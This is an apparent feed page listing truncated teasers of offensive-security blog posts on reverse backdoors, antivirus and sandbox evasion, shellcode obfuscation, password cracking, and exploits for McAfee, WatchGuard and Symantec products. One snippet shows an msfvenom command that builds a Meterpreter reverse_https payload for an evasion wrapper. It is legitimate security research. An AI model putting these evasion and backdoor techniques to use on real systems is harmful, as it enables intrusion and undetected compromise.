Clik here to view.
Reverse SSL backdoor with socat and metasploit (and proxies)
1. Introduction This is a short article explaining how to quickly create a reverse backdoor: for Windows or Linux (this article will focus on Windows) using encrypted communication inside an SSL tunnel...
View ArticlecD00r Knocking backdoor (improved)
1. Introduction Standard backdoors and remote access services have one major drawback: The port’s they are listening on are visible on the system console as well as from outside (through port...
View ArticleClik here to view.
100% Anti-Virus evasion with Metasploit browser exploits (example with ms11-003)
1. Introduction If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection. No. This...
View ArticleClik here to view.
Simple shellcode obfuscation
1. Introduction This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to...
View ArticleClik here to view.
Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o...
View ArticleClik here to view.
Antivirus Sandbox Evasion (part2) – Slides
Hello, Here is the PowerPoint presentation explaining the sandbox evasion technique, used in the part 1 of this story (see Antivirus Sandbox Evasion (par1)). Enjoy, Note: There is a rating embedded...
View ArticleClik here to view.
psk-crack (ike-scan) CUDA add-on
UPDATE: Thinks are moving well on Hashcat.net ! https://hashcat.net/trac/ticket/5 Hello, If you are familiar with ike-scan and you hold NVidia card(s), you could be interested by cracking Pre-Shared...
View ArticleClik here to view.
Antivirus Sandbox Evasion (part3) – The Tool
Ok, here we are.. Thank you for your patience. It is time to release the version 0.1 of the “tool“.. The archive is composed of: An EXE template (ultimate-payload-template1.exe) which manage the...
View ArticleMetasploit plugin: notify_mail.rb (email notification)
1. Introduction Here is a Metasploit plug-in which allows you to get e-mail notifications when new sessions open. The usage of this plug-in makes sense during Social Engineering attacks, or during...
View ArticleClik here to view.
Metasploit stager: reverse_https with basic authentication against proxy
1. Introduction If reverse_https does an amazing job by supporting proxy server and NTLM authentication, it exists some situations where the proxy server only manage basic authentication, and where you...
View ArticleExploit: McAfee ePolicy 0wner (ePowner) – Preview
If you heard about the following vulnerabilities in McAfee ePolicy Orchestrator version 4.6.5 and earlier: CVE-2013-0140 – Pre-authenticated SQL injection CVE-2013-0141 – Pre-authenticated directory...
View ArticleCracking WatchGuard passwords
Watchguard Firewall appliances offer the ability to manage policies per user. Several mechanisms can be used to authenticate users (Active Directory, LDAP, Radius, ..) including a local database called...
View ArticleClik here to view.
WatchGuard – CVE-2013-6021 – Stack Based Buffer Overflow Exploit
1. Introduction This blog entry aims to provide the reader with technical details about the stack-based buffer overflow that we’ve discovered in the web administration console of the WatchGuard XTM...
View ArticleClik here to view.
Turning your Antivirus into my botnet – OWASP Benelux 2013 – Slides
Below are the slides that I’ve presented at the OWASP Benelux day 2013 (Amsterdam). It covers partial results of my research about Managed Antivirus software, especially how I’ve chained multiple...
View ArticleClik here to view.
Symantec Endpoint Protection Manager – CVE-2013-1612 – Remote Buffer Overflow...
Hello, Do want to help me to turn this PoC into reliable exploit code ? Here is the short story about CVE-2013-1612, a remote buffer overflow that I’ve reported to Symantec in June 2013. The...
View ArticleClik here to view.
Exploit: McAfee ePolicy 0wner (ePowner) v0.1 – Release
UPDATE: Version 0.2 released on 29th of June 2014. Check out https://github.com/funoverip/epowner. Hi, I received so many requests for this exploit code. Usually my response was something similar to:...
View ArticleClik here to view.
GNU Radio – CC1111 packets encoder/decoder blocks
Introduction I recently worked with RF transmissions between CC1111-based devices (the chips that are supported by RFCat) and I was in the need to easily encode and decode my payloads using GNU Radio....
View ArticleClik here to view.
Reverse Engineer a Verisure Wireless Alarm part 1 – Radio Communications
1. Introduction Verisure is a supplier of wireless home alarms and connected services for the home. A Verisure setup can be composed of multiple devices, sensors and/or detectors such as Motion...
View ArticleClik here to view.
Reverse Engineer a Verisure Wireless Alarm part 2 – Firmwares and crypto keys
1. Introduction So we’re back, ready to run through an additional step into our Verisure Wireless alarm journey. This post is the second chapter of my Verisure story where we’ll learn how to extract...
View ArticleMcAfee SiteList.xml password decryption
Recently, a very good friend of mine (@Sn0rkY) pointed me out the story of a pentester who recovered the encrypted passwords from a McAfee SiteList.xml file, using Responder (link). Simply clever....
View Article